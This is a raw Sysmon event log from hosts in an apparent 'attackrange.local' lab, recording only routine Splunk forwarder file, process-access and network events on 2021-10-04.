07:53:36.481{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081946Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081945Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081944Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B300-615A-5C01-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081943Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.481{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B300-615A-5C01-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081942Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:36.482{2FDD8D40-B300-615A-5C01-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104021Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:36.325{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDC6F1ED844294CB6B4ACD053E56A263,SHA256=9BA527B79D340D4C54139E348117F0C0825913515FC060391A289832DAE20F73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104022Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:37.325{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DF18151E1C52E675D03BEEB3917847D,SHA256=249FC0204810EEFD68BB3CE9164F3F1C18393CE07E01481B7B123894DA809DF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081958Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:37.497{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A851FF0CDE14F146BC089D3045B994,SHA256=7BBA41577D5FDE9708F565B967FF5AB9B71C46A03225F23AAA39E76356EBF0A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081957Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:37.497{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4747EB022E883044FF0D426C13D6495E,SHA256=B9C1028E93B4442B19892B90A7DBBD1C0304C438C5F6E32861FCEE5BF98B95FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104023Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:38.325{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2387F5A8F60C6970A463E16FF983995,SHA256=7F0E91188934B7FA8990CDC687BE2826C4B3E50D550CEBEC0049A1CB82706EDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081959Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:38.497{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61A822F4EB6AD737C5F25A78743A11B8,SHA256=37AB659E89805771C1E701359A0BC58C2C4FC3EFBECF49DDC3E4E0A7D65BC678,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081961Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:37.565{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50063-false10.0.1.12-8000- 23542300x800000000000000081960Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:39.497{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A23F61AE9E8FFF3380E16B322C4908D,SHA256=59C571C238B1C8264483A1B1E612D5C7475DB0D3F73B4538151B64611C6A6E9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104025Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:39.325{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0431B50F05134E06CBA0404694D3229F,SHA256=5D48C39A6EA71E5DDA59B8BD66112612E4A64C3742146ADA8ED025912D791F7E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104024Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:37.345{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49569-false10.0.1.12-8000- 23542300x800000000000000081962Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:40.497{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AB9C19D59C6A69A20217CCB41FE702C,SHA256=40DD7760206AEA2534DB03869017B0B1782BE3090436B781E76F3E56F02D4906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104026Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:40.325{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28F348DD5064A63566A7A435F61AE30B,SHA256=A4812F0E9959C32E488064F1862C0591CE68DE93D5D3A714B6F055589761727B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104027Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:41.357{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43CC16B382C67F2BED1898E860412C9C,SHA256=77366B8A250DEB3CCAA78764FE61217020CFBA8801589872629532B5B3EDF4F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081963Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:41.513{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6654CFE80AC896466D56877EC01A8E3,SHA256=BDC41636245EEB3B7263B005895B74A70C818094690D81FF8616716AC0B8DFB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104028Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:42.357{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E5F91FB3BCC210068C6A63F34B85FCE,SHA256=F03FDB14AF6FDF10D07EDDC37099841DCD2E2CBBC68E029106DD3933892566CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081964Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:42.513{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73AE4A67993704C9D6695196AB7F0868,SHA256=6A72AD2E5D9814F5D71C63B93B71EF5E8C5FE93040DC7636EF5A264554083EB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081965Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:43.513{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CE93F8D1AA069E160A787AF6D757B29,SHA256=4A5427E1C56C00E9B4DC1849D045B43E43FF7D57131C6ACDC6B7DBC28A70164C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104030Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:43.622{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=BAB13A270F23890FB19DA0B9344FC1DE,SHA256=5251E0D53734AF3DD9568F8C99F007819296565B57554398980D1F766EB259FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104029Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:43.372{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4004E66623EF577011E111D9236A2299,SHA256=9C56D102BB38FC6577E8C8BBC765A54E4A9DF51F47BEFC140F8BFDA3444042A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081967Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:42.675{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50064-false10.0.1.12-8000- 23542300x800000000000000081966Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:44.684{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55BAAD364FFC95EC1089107A89C1C91F,SHA256=DBEBF802123BF239158C51A6AC2359CFDFD90A2668B9F9497FD748AF85EDCC2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104032Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:43.391{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49570-false10.0.1.12-8000- 23542300x8000000000000000104031Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:44.419{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E13ABADC3A165338E18CFB9F8DA185F,SHA256=66C58E771639EFAC81BD2B5BFA6C1C8492F2260A07454C3D0D508B129FD38F48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081968Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:45.716{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72F1A28889D78F21ACA67A3AEA599FB3,SHA256=D414FA296006F0EF0F155564C113A1A36AF06973438AD9AE0EC5A71A9FD774D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104033Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:45.419{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CFBC74B9CE5C2806634501D780D52CD,SHA256=6C8A3E753F9B542551EC297BB581B562BDC30EEEB59B4B87A386E56DF379A81E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081969Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:46.778{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22D8705846209DEFDF9E829A4B6F74B5,SHA256=49971C7BBE69CD01F2B98C125A4ECC264A09C1BFC982259499D96FE494529FD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104034Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:46.419{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF9184D786BF9172BF67BBC060A1999A,SHA256=2BF92A4595B0EB54D492B5199E07DC37D04322363FCFC4155D1D0D781964B202,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081970Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:47.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2227E45B0D01BD3F0D70C24404152AD1,SHA256=F3712C2D6586386F5E612C6FB425167D2FCBA79208F23E9DCDB0734C2E880E03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104035Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:47.435{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0F7B4603F7882316035DDE51B52852D,SHA256=64AE1CABC351284E98CB0FC27D5F42FE2F49C57C963E99B0303B45FE01C85F4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104036Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:48.435{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F09BB1F669F1FD42A203AE2DB1D4C30,SHA256=F7D1892FAFB94DCA361470781A0CF90410785E403E5A38074524EBCA199C46EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104037Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:49.435{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE0CE83019822219C47113705D2026E5,SHA256=F35F440D762F36495D94CF31BE3DAC03B0667CBF84443CA0575E92EB8FD84AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081971Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:49.075{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CBDD6488102BB5C88DDEC44707CD93D,SHA256=92CAAC57243B038597063E61CAD5B7A758D1E59C15C6DDF5D6C07D726AE57489,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104038Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:50.528{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=336381FEBE302AF84FD26D62086045CB,SHA256=64807052318EC81C071BC0212C93470457A24D28D3BFF7E6C4E59CF8057CCE56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081972Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:50.091{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A581A5CF310C59312B65B6BF96D5460,SHA256=4060F0CBB4D01C75C8CBF12D628EE830325BCF820D0A4A70203297FB64B2F07E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104040Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:51.544{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70E9D3A3FADDE98FA52DB661278F38BF,SHA256=622914BCAB6B19C3D29325013CAEA8A9ECA40DE0D585F779A08EA2A3E5B77B96,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081974Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:48.612{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50065-false10.0.1.12-8000- 23542300x800000000000000081973Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:51.169{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E3CBB6039E56FD03CE571494A562C09,SHA256=B2E0DE5147FDA7C8A278E31A3ECAB36DFB6F881975D02BC94F77EF491E3C3985,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104039Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:49.423{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49571-false10.0.1.12-8000- 23542300x8000000000000000104041Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:52.575{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=338FD7AEE5C152C06308820E42E57454,SHA256=9F98862CACABE78A79C987D7F45DA21DD712E5B5D952C0BF596B03FB1A5CD571,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081975Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:52.216{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0994744E408B03DDE1C75ADE6EE17B79,SHA256=838B1260C5A3D0E4A326F9CB9FEC0C95E1B90285B12608F950BA18118B135592,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104042Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:53.591{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=398F1016EED1565D08D4EA39ABE92338,SHA256=C53200662DABCD97864102E2EB05F1DE27EBF1C382A2C170552750B676879222,IMPHASH=00000000000000000000000000000000falsetrue 